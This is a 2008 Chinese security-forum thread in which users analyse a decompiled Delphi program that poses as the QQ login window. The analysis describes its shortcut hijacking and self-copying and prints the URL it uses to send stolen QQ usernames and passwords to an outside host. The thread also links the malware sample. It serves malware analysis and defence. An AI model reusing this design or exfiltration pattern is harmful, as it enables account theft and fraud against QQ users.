瑞星卡卡安全论坛技术交流区可疑文件交流 截获一个貌似木马客户端,求分析 收藏

1   1  /  1  页   跳转

截获一个貌似木马客户端,求分析 收藏

截获一个貌似木马客户端,求分析 收藏

截获一个貌似木马客户端,求分析
截获了一个貌似木马客户端的.exe的文件,没有加壳,但是所有的杀毒软件和卡卡助手及360安全卫士都查不出来。

但是QQ还是会被盗,被盗了以后会发虚假信息到QQ好友,借钱,主要是借钱。


文件被压缩到了附件,双击后会在C:\Program Files生成一个带有QQ图标的exe文件,桌面上原QQ快捷方式会被更改到此文件。

可疑文件:http://bbs.ikaka.com/attachment.aspx?attachmentid=409405

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
分享到:
gototop
 

与其说它是木马,还不如说它是钓鱼,以下为反编译后的分析

这是Delphi 7所写的程序,无壳,所以非常容易地使用DeDe就可以反编译了
然后用Delphi 7打开,其窗口类和各个对象就一览无余了。
看完了之后,我的确想笑,因为这种东东,随便一个Delphi的初学者,就整得出来的。

你可以看到,它的窗口乍一看来和真正的QQ窗口很像:

 附件: 您所在的用户组无法下载或查看附件
这个窗口的组成,可见反编译后的pas文件:

  TForm1=class(TForm)
    Image1: TImage;
    Edit1: TEdit;
    Edit2: TEdit;
    Image2: TImage;
    IdHTTP1: TIdHTTP;
    procedure Image2Click(Sender : TObject);
    procedure FormCreate(Sender : TObject);
    procedure Edit2KeyDown(Sender : TObject);
    procedure FormShow(Sender : TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end ;


主窗口为TForm1类
两个文本输入框为TEdit类,分别为Edit1(输入QQ号)和Edit2(输入密码)
而登录按钮,其实是个图,TImage类,名为Image2
窗口客户区的其他内容,其实就是另一张图Image1伪装出来的
另外还有一个TIdHTTP类的IdHTTP1组件。这个组件在程序运行的时候,是不可视组件,也就是其实是见不到的。
用Delphi的初学者就知道,这个组件就是indy包中的最常用的进行网络访问的类,直接使用其Get方法就可以访问网络URL地址。
这个组件在这里就是为了把用户输入的用户名和密码传送出去。

显然,这是一个通过将自身伪装成QQ登录窗口,诱骗用户输入用户名和密码,并将用户名与密码传送出去的程序。

窗口(也就是这个程序)主要的功能和动作,包含在它的几个procedure中。
按通常的程序运行和用户点击的顺序,大致过程和功能分别如下:
1. 程序首次被运行:
procedure FormCreate(Sender : TObject);{当程序运行,窗口收到WM_CREATE消息时,该函数被调用}
begin
通过读取注册表
[HKEY_CURRENT_USER\Software\MicroSoft\Windows\CurrentVersion\Explorer\Shell Folders]
中的Desktop、Start Menu两个键的值
得到当前用户的桌面和开始菜单的路径
然后向这两个路径下写入"腾讯QQ.lnk"快捷方式,指向程序自身
使用TlHelp32系列API遍历进程,查找其中是否有真正的QQ进程"qq.exe",有则结束其进程。
检查自身文件路径是否为"C:\Program Files\aq.exe",如不是,则将自身文件copy到C:\Program Files\aq.exe并运行之,之后自身退出。

end;

程序第一次运行时,路径不在C:\Program Files\aq.exe,因此只进行到FormCreate过程之后,就结束了。
这时C:\Program Files\aq.exe则已被运行起来。

C:\Program Files\aq.exe的动作:
2. C:\Program Files\aq.exe运行后,同样再跑一次FormCreate,这时开始菜单和桌面下的腾讯QQ.lnk的目标就变成了C:\Program Files\aq.exe
之后程序不退出,继续

3.procedure FormShow(Sender : TObject);{窗口收到WM_SHOW消息时被调用}
begin
使用TIdHTTP1组件,访问http://www.ip138.cn/从返回的源文件内容中得到本机的IP地址,保存起来。
end;

这个步骤完了之后,窗口就出来了。接着就等着用户输入用户名和密码,并按回车或者点“登录”的图片了

4.procedure Edit2KeyDown(Sender : TObject);{密码输入框,当用户每次在其中用键盘输入时,此函数被调用}
begin
判断输入的字符是不是0x0D,是则说明用户按下了回车键,调用Image2Click。
end;

5.procedure Image2Click(Sender : TObject);{当用户按下“登录”的图片,或在密码输入框按回车键时,此函数被调用}
begin
获得Edit1中的用户名字符串,以及Edit2中的密码、之前保存下来的IP地址、当前的日期和时间
把这些组成如下URL(设输入的用户名和密码分别为111111111及ABCDABCD,IP为192.168.1.0,时间为2008-7-6 15:00:00):
"http://qazx.okok8.net/8/2.asp?user=111111111&pass=ABCDABCD    192.168.1.0    2008-7-6 15:00:00"
调用IE进程访问此URL地址。实际上也就是通过2.asp对参数的识别传送了QQ用户名密码、IP地址以及时间的信息。
最后,访问注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\PlatForm_TYPE_LIST\1]
通过其中的TypePath键值,得到QQ程序的全路径
然后将用户输入的用户名和密码作为参数,通过WinExe启动QQ程序
最后,自身程序退出。

end;
最后编辑轩辕小聪 最后编辑于 2008-07-06 15:35:02
病毒样本请发到可疑文件交流区
gototop
 

回复 2F 轩辕小聪 的帖子

学习了,受益匪浅
gototop
 

回复:截获一个貌似木马客户端,求分析 收藏



奶奶的,杀软和360及kaka都不报。

偶没学过Delphi,之前用DEDE反编译了,但什么都不懂,郁闷啊!
gototop
 

回复:截获一个貌似木马客户端,求分析 收藏

不过话说过来,这个伪装的QQ程序还是骗到了好多人
gototop
 

回复:截获一个貌似木马客户端,求分析 收藏

瑞星已经收录了这个样本,今天扫描的时候清除了!
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT